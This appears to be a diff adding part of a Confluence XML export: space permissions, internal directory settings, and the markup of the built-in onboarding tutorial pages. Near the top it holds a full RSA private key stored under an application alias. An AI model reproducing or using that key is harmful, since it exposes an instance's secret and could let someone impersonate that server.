+<id name="id">65537</id>
+<property name="alias"><![CDATA[confluence:174556]]></property>
+<property name="key"><![CDATA[ RSA public MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArOTFjqwSVsGy6FLWppvYB04deZb5FsAe8BwS2mub/YFUOmc61ia97mcHDaqPKyRrM7QlJUdAQXRWMqycZuumGUahSyC6xsxsQLHSPsf2f6f1naTdL4anPfvzWlYaAl+WAPydpY9ZkgWlxXxzbmvd8Av4Ay84P8qfCNdufpn9QshrV0F3ZODU4gCr2LJRd49eWGSpxUJDvL9MQNOrxtyaDb9r/mxZ48Ed0Fn+kBmLrBxryyC055I0dBIS+JKDQb3qbHymwBQ1qYPdR85BIO6ozYd4UQ1ZeaeKK4T/zn7nohlVyLlDhcfGW0SicxkGfXOiDl8YgaGZeJQXSiQeHTYRYwIDAQAB ]]></property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458756</id>
+<property name="type"><![CDATA[USECONFLUENCE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.397</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.397</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458757</id>
+<property name="type"><![CDATA[SYSTEMADMINISTRATOR]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.406</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.406</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458758</id>
+<property name="type"><![CDATA[PERSONALSPACE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.410</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.410</property>
+</object>
+<object class="AliasedKey" package="com.atlassian.confluence.security.persistence.dao.hibernate">
+<id name="id">65538</id>
+<property name="alias"><![CDATA[confluence:174556]]></property>
+<property name="key"><![CDATA[ RSA private MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCs5MWOrBJWwbLoUtamm9gHTh15lvkWwB7wHBLaa5v9gVQ6ZzrWJr3uZwcNqo8rJGsztCUlR0BBdFYyrJxm66YZRqFLILrGzGxAsdI+x/Z/p/WdpN0vhqc9+/NaVhoCX5YA/J2lj1mSBaXFfHNua93wC/gDLzg/yp8I125+mf1CyGtXQXdk4NTiAKvYslF3j15YZKnFQkO8v0xA06vG3JoNv2v+bFnjwR3QWf6QGYusHGvLILTnkjR0EhL4koNBvepsfKbAFDWpg91HzkEg7qjNh3hRDVl5p4orhP/OfueiGVXIuUOFx8ZbRKJzGQZ9c6IOXxiBoZl4lBdKJB4dNhFjAgMBAAECggEAM9D+moNcna7AyVsmZNmZNZtGPy4tqhFbVFf9mIOexSvRDA3rNsp2qvAqz4A6F1J7ZIwNg+4mRlexC8/qsffXGIUwCv2crL8QhJUmr1UrvdefR6dk+Pzwu6V6qiza77IpGVOchcWAMUDLDXR+fe4LHonfw0iQIaI+5p32SjAplK1QsFbUmcmNqDr+lBIord6xwRjqJJnN5scHfV3zPKn8boida508IaSrvpFBfEMcq77Mw0wPKzPFToKGkOaGAp2mRNBoz9j4vVvy0snOee51tRtlVPu1+Hp8q4nNbif8oJPc9eVjSO48kUOncIZmyx4HYc04UgYn5du66vnqbEbjGQKBgQDoUz/GFrP5zaWPB1AJZgeDUt8+3D9eH7C96J9Td3gaNsVsLgRHd98L8oQaTZxxSrKCAEFkroI15Sapa4HZ0klrWTmZWk0Z2nP8YsotPz345+Ywj4a9+m7+HBisDREt+vT8X3lV83B22/WyQf8dd8Bo1XBslve0H0c8S+8BB5C/aQKBgQC+gxw8gm55a95EFLMS3xDtuJTaUkqHm35k5Hd11G4wSetlTCVRKQ5ErnpSvTFH4f2n5Ke4CEdFFgqYIlnhIfzUYyfeeswcxokbwFnDiF8e76Uel0Asng8a0TbJEmGtrkCAW9cQSFX5gFx26VwT7BW2Tu6GzoY8pduq9h2ihTP86wKBgQCkBlKaSmEa1uQyjRkm6ZAYWaQgP2PF0l34VopWZZy39T+BVyPSSYGCb+BwqabwHarWOdPxf3uTDYw0RSDSZrNLRR1zddvFiwQkhqLzOxlH6IIOeubIrk06vx90KW2dpvbcT5Pc6RjX8ggPqKSza16/JSJQqG2OEB89JOdDNNIvMQKBgQCx/fDtn7bzfpJk7Sn5oatBTsjTyTqUw/Qs8z+hON3SA94IAEKFN2R7SsBCeTyHul6w8/K3ABUGOPeg98cdjhGXpSRkujnlUKBc6zNyegDU+HU+xXVRukLGfV1AMwpLqJfe1O9z6QFaYFEDUDeU7WfDsq8sB9xm4VcAvX0mkGjoDQKBgAiPqCJ/bRYhkbs4ZRRfioa5EfQG6oH9VEVHSXP4lG+wzRMjFKOvA+cosXlnZlkqTFzX2bFW2Hm582ikaY1AYHS/gGNPKoN5FRxR+4s3bZ4kQ2YRj1X6aTnE6cG5UWyzHKQXmxYSiLEbS1bofb1D8qaBVWhoJ74DcsfWCeY58gGT ]]></property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458759</id>
+<property name="type"><![CDATA[CREATESPACE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.415</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.415</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458753</id>
+<property name="type"><![CDATA[USECONFLUENCE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.336</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.336</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458754</id>
+<property name="type"><![CDATA[PERSONALSPACE]]></property>
+<property name="group"><![CDATA[confluence-users]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.391</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.391</property>
+</object>
+<object class="SpacePermission" package="com.atlassian.confluence.security">
+<id name="id">458755</id>
+<property name="type"><![CDATA[ADMINISTRATECONFLUENCE]]></property>
+<property name="group"><![CDATA[confluence-administrators]]></property>
+<property name="allUsersSubject"/><property name="creationDate">2023-11-09 06:04:18.394</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.394</property>
+</object>
+<object class="DirectoryImpl" package="com.atlassian.crowd.model.directory">
+<id name="id">360449</id>
+<property name="name"><![CDATA[Confluence Internal Directory]]></property>
+<property name="lowerName"><![CDATA[confluence internal directory]]></property>
+<property name="createdDate">2023-11-09 06:04:18.127</property>
+<property name="updatedDate">2023-11-09 06:04:18.127</property>
+<property name="active">true</property>
+<property name="description"><![CDATA[Confluence default internal directory]]></property>
+<property name="implementationClass"><![CDATA[com.atlassian.crowd.directory.InternalDirectory]]></property>
+<property name="lowerImplementationClass"><![CDATA[com.atlassian.crowd.directory.internaldirectory]]></property>
+<property name="type" enum-class="DirectoryType" package="com.atlassian.crowd.embedded.api">INTERNAL</property>
+<collection name="allowedOperations" class="java.util.Set"><element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_ROLE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_ROLE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE</element>
+</collection>
+<collection name="attributes" class="java.util.Map"><element name="user_encryption_method" type="string"><![CDATA[atlassian-security]]></element>
+</collection>
+</object>
+<object class="ApplicationImpl" package="com.atlassian.crowd.model.application">
+<id name="id">327681</id>
+<property name="name"><![CDATA[crowd-embedded]]></property>
+<property name="lowerName"><![CDATA[crowd-embedded]]></property>
+<property name="createdDate">2023-11-09 06:04:18.083</property>
+<property name="updatedDate">2023-11-09 06:04:18.165</property>
+<property name="active">true</property>
+<property name="description"/><property name="type" enum-class="ApplicationType" package="com.atlassian.crowd.model.application">GENERIC_APPLICATION</property>
+<component name="credential"><property name="credential" type="string"><![CDATA[X]]></property>
+</component>
+<collection name="attributes" class="java.util.Map"><element name="com.sun.jndi.ldap.connect.pool.initsize" type="string"><![CDATA[1]]></element>
+<element name="atlassian_sha1_applied" type="string"><![CDATA[true]]></element>
+<element name="com.sun.jndi.ldap.connect.pool.timeout" type="string"><![CDATA[30000]]></element>
+<element name="com.sun.jndi.ldap.connect.pool.authentication" type="string"><![CDATA[simple]]></element>
+<element name="com.sun.jndi.ldap.connect.pool.maxsize" type="string"><![CDATA[0]]></element>
+<element name="com.sun.jndi.ldap.connect.pool.prefsize" type="string"><![CDATA[10]]></element>
+<element name="aggregateMemberships" type="string"><![CDATA[true]]></element>
+<element name="com.sun.jndi.ldap.connect.pool.protocol" type="string"><![CDATA[plain ssl]]></element>
+</collection>
+<collection name="directoryMappings" class="java.util.List"><element class="DirectoryMapping" package="com.atlassian.crowd.model.application"><id name="id">393217</id>
+</element>
+</collection>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163844</id>
+<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p><span style="color: rgb(64,64,64);">Confluence automatically transforms linked content</span>&nbsp;<span style="color: rgb(64,64,64);">into rich content.</span>&nbsp;<span style="color: rgb(64,64,64);">Try it with Confluence pages, JIRA issues, YouTube and Vimeo videos,&nbsp;<br /></span><span style="color: rgb(64,64,64);">Flickr photo streams, Tweets, Google maps and many more.</span></p><p><span style="color: rgb(64,64,64);">Here's two examples of autoconvert in action.</span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_equal"><ac:layout-cell><h3>&nbsp;&nbsp; <br /><ac:structured-macro ac:name="widget" ac:schema-version="1" ac:macro-id="e115eec2-dcf7-445c-b563-aca39824d38e"><ac:parameter ac:name="url"><ri:url ri:value="http://youtube.com/watch?v=RXhL9cfwx2c" /></ac:parameter></ac:structured-macro></h3></ac:layout-cell><ac:layout-cell><p><span style="color: rgb(0,0,0);"> <ac:structured-macro ac:name="widget" ac:schema-version="1" ac:macro-id="6f0d84bb-46ee-40a0-8379-fb9a87faf7c7"><ac:parameter ac:name="url"><ri:url ri:value="https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;hl=en&amp;ll=-33.866572,151.207001&amp;spn=0.004321,0.008256&amp;sll=-33.870509,151.203707&amp;sspn=0.008641,0.016512&amp;oq=atlassian,&amp;hq=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;radius=15000&amp;t=m&amp;z=18&amp;iwloc=A" /></ac:parameter></ac:structured-macro> </span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_equal"><ac:layout-cell><h3><span style="color: rgb(51,51,51);">Try it yourself:</span></h3><ol><li><span> <span> <span style="color: rgb(51,51,51);"> <span> <strong>Edit</strong>&nbsp;this page.</span> </span> </span> </span></li><li><span> <span> <span style="color: rgb(51,51,51);"> <span>Copy this link&nbsp;<a href="https://youtu.be/RXhL9cfwx2c">https://youtu.be/RXhL9cfwx2c</a> and paste it onto the page.</span> <br /></span> </span> </span></li><li><span style="color: rgb(51,51,51);">Autoconvert will&nbsp;embed the YouTube video on the page.</span></li><li><span style="color: rgb(51,51,51);">Save the page. <br /></span></li></ol></ac:layout-cell><ac:layout-cell><h3><span style="color: rgb(51,51,51);"> <span style="color: rgb(51,51,51);">Try it yourself</span>:</span></h3><ol><li><strong>Edit</strong>&nbsp;this page.</li><li>Copy this link &nbsp;<a href="https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;hl=en&amp;ll=-33.866572,151.207001&amp;spn=0.004321,0.008256&amp;sll=-33.870509,151.203707&amp;sspn=0.008641,0.016512&amp;oq=atlassian,&amp;hq=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;radius=15000&amp;t=m&amp;z=18&amp;iwloc=A">https://maps.google.com/maps?q=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;hl=en&amp;ll=-33.866572,151.207001&amp;spn=0.004321,0.008256&amp;sll=-33.870509,151.203707&amp;sspn=0.008641,0.016512&amp;oq=atlassian,&amp;hq=Atlassian,+George+Street,+New+South+Wales,+Australia&amp;radius=15000&amp;t=m&amp;z=18&amp;iwloc=A</a>&nbsp;and paste it onto the page.&nbsp;</li><li>Autoconvert will render the Google Maps view on the page.</li><li><span style="color: rgb(51,51,51);">Save the page. <br /></span></li></ol></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"> <br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"> <ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> </span></h1><p><span style="color: rgb(51,51,51);"> <br /></span></p></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163845</id>
+<property name="body"><![CDATA[<p><span style="color: rgb(64,64,64);"><br /></span></p><p><span style="color: rgb(64,64,64);">Once you've created content you'll want to share it with your team members.&nbsp;<br /></span><span style="color: rgb(64,64,64);">Confluence can do all the work for you, just click the <strong>Share</strong> button.<br /></span></p><p style="margin-left: 30.0px;"><span style="color: rgb(64,64,64);"><span style="color: rgb(64,64,64);"><br /></span></span></p><ol><li>Let's tell someone about this page. <br />Click the <strong>Share</strong> button at the top right of the page. It looks like this:<br /><br /><ac:image ac:width="379"><ri:attachment ri:filename="step09-01.png" /></ac:image><br />&nbsp;</li><li>Type the name of the person or group you want to share the page with. <br />You can also enter an email address. <br /><br /></li><li>Add a message to give the person some background about the page.<br /><br /></li><li>Click the <strong>Share</strong> button. <br />Confluence will send the person an email message about this page. Shared!</li></ol><p>&nbsp;</p><p><img class="emoticon emoticon-warning" title="(warning)" src="http://localhost:8090/s/en_GB/7502/10587128b0de2a71f82b5acc129b8b5611829c93/_/images/icons/emoticons/warning.png" alt="(warning)" border="0" /><span style="color: rgb(64,64,64);"> If your administrator has not added a mail server, the&nbsp;</span><strong>Share</strong><span style="color: rgb(64,64,64);"> button will only show the share link.<br /></span></p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;</span></h1><p style="margin-left: 30.0px;"><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163846</id>
+<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p style="margin-left: 60.0px;"><br /></p><p>Insert tables with drag and drop simplicity. <br />Add, remove, cut, and paste rows and columns &ndash; this makes working with tables easy. <br />&nbsp;</p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_right_sidebar"><ac:layout-cell><ol><li><span style="color: rgb(51,51,51);"><strong>Edit</strong>&nbsp;the page.<br />&nbsp;<br /></span></li><li><span style="color: rgb(51,51,51);">Click in the right-hand column to position your cursor.<br />&nbsp;<br /></span></li><li>Click the <strong>Table</strong> menu on the toolbar and drag to choose the size of your table. <br /><br /><ac:image ac:thumbnail="true" ac:width="225"><ri:attachment ri:filename="step05-01.png" /></ac:image><br />&nbsp;</li><li>The table toolbar appears when there is table on your page.<br /><br /></li><li>Place your cursor in the first cell of the table and add a row below it.<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step05-03.png" /></ac:image><br /><br /></li><li>Place your cursor in any cell of the last column of the table and delete the column.<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step05-04.png" /></ac:image><br />&nbsp;</li><li>Grab one of the column borders and drag to resize the column.<br /><br /></li><li><span style="line-height: 1.42857;">Click&nbsp;</span><strong style="line-height: 1.42857;">Update&nbsp;</strong><span style="line-height: 1.42857;">to publish your changes to the page.</span></li></ol></ac:layout-cell><ac:layout-cell><p><br /></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163847</id>
+<property name="body"><![CDATA[<p><br />You can start a discussion by simply leaving a comment on a page, like this one.</p><p>Why not give it a try?</p><p>Go to the bottom of this page and start typing in the comment area. When you're finished just press save!&nbsp;</p><p>Don't just confine your comments to the bottom of the page - highlight some text on the page to add an inline comment like this:</p><p><br /></p><p><ac:image ac:width="417"><ri:attachment ri:filename="Step8-01.png" /></ac:image></p><p><br /></p><p><strong>Hint:</strong> You can mention another user in a page or&nbsp; comment by typing @ and then the user's name. <br />The user will be notified that you mentioned them.</p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:link-body><ac:image ac:height="40" ac:width="106"><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Share your page with a team member (step 9 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></h1><p><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163848</id>
+<property name="body"><![CDATA[<p>Page layouts provide structure in your page &mdash; two-column, three-column, and more &mdash; making it easy for anyone to create beautiful pages.</p><p>&nbsp;</p><ol><li><span style="color: rgb(51,51,51);"><strong>Edit</strong>&nbsp;the page.<br />&nbsp;&nbsp;</span></li><li><span style="color: rgb(51,51,51);">Click the <strong>Page Layout</strong></span> button in the editor toolbar. It looks like this:<br /><br /><ac:image ac:thumbnail="true" ac:width="160"><ri:attachment ri:filename="step06-image01.png" /></ac:image><br /><span style="color: rgb(51,51,51);"><br />&nbsp;</span>A section is added to your page, dotted lines indicate the section boundaries.&nbsp;<br />&nbsp;</li><li>Choose a <strong>column layout</strong>&nbsp;to apply to your section, for example two columns. <br /><br /><ac:image ac:width="308"><ri:attachment ri:filename="step06-image02.png" /></ac:image> <br />&nbsp;</li><li><span style="color: rgb(51,51,51);">Click the <strong>Add section</strong> button to add another section to the page. <br /><br /><ac:image ac:width="385"><ri:attachment ri:filename="step06-image03.png" /></ac:image><br />&nbsp;</span></li><li><span style="color: rgb(51,51,51);">Choose a different <strong>column layout</strong> for this section.&nbsp;<br /><br /></span></li><li>Click <strong>Update </strong>to publish your changes to the page.</li></ol><p><span>You can add as many sections as you need, and each section can have a different column layout.&nbsp;</span></p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163849</id>
+<property name="body"><![CDATA[<p><br /></p><p>Let's start with the editor. You'll use the Confluence editor to <strong>create</strong> and <strong>edit</strong> pages.<br />You can type in the editor as you would in any document, apply formatting, and embed other content and files into the page.</p><p>The editor looks like this <span style="color: rgb(153,153,153);">(click images for a larger view)</span>:</p><p><br /></p><p><ac:image ac:width="511"><ri:attachment ri:filename="step-2-image-1.png" /></ac:image></p><p><br /></p><p><span>Here is a description of the components:</span></p><ol><li><h4><span style="color: rgb(0,0,0);">Editor toolbar</span></h4><span style="color: rgb(51,51,51);">The editor toolbar provides tools to format and color page content, create lists and tables, indent and align text, and insert other content into the page such as symbols, links, images, multimedia files, and macros.<br /><br /></span><ac:image ac:width="870"><ri:attachment ri:filename="step-2-image-3.png" /></ac:image><br /><br /></li><li><h4><span style="color: rgb(0,0,0);">Page content</span></h4><span style="color: rgb(51,51,51);">This is where you and your team will type the content for your page. You can also drag attachments from your desktop here.<br /></span>If other people are editing the page at the same time, you'll see their changes in real time!&nbsp;<br /><br /><br /></li><li><h4><span style="color: rgb(0,0,0);">Publish or close</span></h4><span style="color: rgb(0,0,0);">We're saving all the time in the editor. &nbsp;Once you're ready, hit <strong>publish</strong> to publish your page so others can see the changes, or <strong>close</strong> to finish editing later.<br /><br /><ac:image ac:width="800"><ri:attachment ri:filename="step-2-image-5.png" /></ac:image></span><br /><br /></li></ol><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="What is Confluence? (step 1 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1><p><span style="color: rgb(51,51,51);"><br /></span></p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163850</id>
+<property name="body"><![CDATA[<ac:layout><ac:layout-section ac:type="single"><ac:layout-cell><p style="margin-left: 60.0px;">&nbsp;</p><p><span style="color: rgb(51,51,51);">The Confluence editor helps you create content, fast. </span><span style="color: rgb(51,51,51);">You can embed images, Office documents, and even videos. <br />That's just the tip of the iceberg when it comes to creating useful content for your team.&nbsp;<br />&nbsp;</span></p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="two_right_sidebar"><ac:layout-cell><ol><li style="text-align: left;"><strong>Edit</strong> the page.<br /><br /></li><li style="text-align: left;">Click in the right-hand column to position your cursor.<br /><br /></li><li style="text-align: left;">Click <strong style="text-align: left;">Files</strong> on the editor toolbar. It looks like this:<br /><br /><ac:image ac:width="301"><ri:attachment ri:filename="step04-01.png" /></ac:image><br />&nbsp;</li><li style="text-align: left;"><span>The Files dialog shows you the files attached to this page. <br />Select the image named&nbsp;<strong>Confluence Origami Necktie</strong>.<br />&nbsp;<br /></span></li><li style="text-align: left;">Click <strong>Insert</strong>.<br /><br /></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">You will return to this page, and see the 'Image Properties Panel'. If you don't see it, click the image.<br />&nbsp;<br /></span></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">Resize the image by clicking on the square buttons or entering a width.<br /><br /><ac:image ac:width="540"><ri:attachment ri:filename="step04-02.png" /></ac:image><br />&nbsp;<br /></span><span style="color: rgb(51,51,51);"><br /></span></li><li style="text-align: left;"><span>Click <strong>Properties </strong>and then select the <strong>Curl Shadow</strong> option from the Image Effects dialog.&nbsp;<br />&nbsp;&nbsp; <br /></span></li><li style="text-align: left;"><span style="color: rgb(51,51,51);">Your image should look like this when completed:<br /><ac:image ac:queryparams="effects=border-simple,shadow-kn" ac:thumbnail="true" ac:width="300"><ri:attachment ri:filename="Confluence-Origami-Necktie.jpeg" /></ac:image><br />&nbsp;</span></li><li style="text-align: left;"><span style="line-height: 1.42857;">Click&nbsp;</span><strong style="line-height: 1.42857;">Update&nbsp;</strong><span style="line-height: 1.42857;">to publish your changes to the page.</span><br /><br /></li><li style="text-align: left;">View the image on the page, or click to preview the file.</li></ol><p style="text-align: left;">The Files button is not just for images, you can insert and preview a wide range of files, including Microsoft Office documents and PDFs.</p></ac:layout-cell><ac:layout-cell><p>&nbsp;</p></ac:layout-cell></ac:layout-section><ac:layout-section ac:type="single"><ac:layout-cell><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></span></h1><p><span style="color: rgb(51,51,51);"><br /></span></p></ac:layout-cell></ac:layout-section></ac:layout>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163851</id>
